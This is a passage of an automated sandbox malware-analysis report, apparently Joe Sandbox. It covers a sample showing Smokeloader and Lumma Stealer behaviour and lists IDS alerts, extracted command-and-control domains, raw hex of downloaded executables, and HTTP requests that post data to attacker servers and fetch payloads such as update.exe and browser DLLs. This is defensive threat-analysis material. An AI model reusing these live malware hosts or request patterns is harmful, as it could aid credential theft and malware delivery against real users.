Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 5_2_0061CD77
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp edx 5_2_00632D5B
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov ecx, dword ptr [esi+08h] 5_2_00643E13
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov eax, dword ptr [esp+000001E0h] 5_2_0061FE1B
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_00633EFE
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+10h] 5_2_00633ECF
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then mov edx, dword ptr [esi+00000080h] 5_2_00635F55
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 4x nop then jmp dword ptr [004421CCh] 5_2_0062CF1A

Networking

Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49711 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49712 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49713 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49714 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49715 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49716 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49718 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.5:63577 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49720 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49722 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49723 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49731 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49732 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49734 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49772 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49773 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49774 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49775 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49776 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49777 -> 190.187.52.42:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49778 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49779 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49780 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49781 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49782 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49783 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49784 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49785 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49786 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49787 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49788 -> 88.225.215.104:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49789 -> 88.225.215.104:80
Source: C:\Windows\explorer.exe Network Connect: 190.187.52.42 80
Source: C:\Windows\explorer.exe Network Connect: 88.225.215.104 80
Source: C:\Windows\explorer.exe Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe Network Connect: 23.145.40.124 80
Source: C:\Windows\explorer.exe Network Connect: 45.129.96.86 80
Source: Malware configuration extractor URLs: boredimperissvieos.shop
Source: Malware configuration extractor URLs: holicisticscrarws.shop
Source: Malware configuration extractor URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor URLs: plaintediousidowsko.shop
Source: Malware configuration extractor URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://lobulraualov.in.net/tmp/index.php
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 08:30:27 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 08:30:02 GMTConnection: keep-aliveETag: "6652f30a-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 08:30:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 08:26:18 GMTETag: "205e00-6195727a15e80"Accept-Ranges: bytesContent-Length: 2121216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 20 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 4a 22 00 00 00 70 0a 00 00 44 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 3c bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 08 09 00 00 10 00 00 00 0a 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 
c4 26 00 00 00 20 09 00 00 28 00 00 00 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 2d 0d 00 00 00 50 09 00 00 00 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 4a 22 00 00 00 60 09 00 00 24 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 90 09 00 00 00 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 a0 09 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 3c bd 00 00 00 b0 09 00 00 be 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 44 16 00 00 70 0a 00 00 44 16 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 00 00 00 00 00 00 5e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 190.187.52.42 190.187.52.42
Source: Joe Sandbox View ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View ASN Name: AMERICATELPERUSAPE AMERICATELPERUSAPE
Source: Joe Sandbox View ASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU
Source: Joe Sandbox View ASN Name: TTNETTR TTNETTR
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7083Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1229Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583478Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBGCAFIIECBFIDHIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKEBFCFIJJKKECAKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAFCAKEHDHDHIDHDGDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5557Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 129597Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jcnkksjnacxjwh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eaaqpotuqgvxxvep.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eskqecavndurqirx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pvhxcowxrsmsmxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xhkcnscxetvodwbe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmdyxmgpkfrir.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsvttmlmwckhyv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmxjggdvslwul.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dsnbbvyutqhm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://alfdwfnhtcwp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://utrnyeeydifgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dbfhns.in
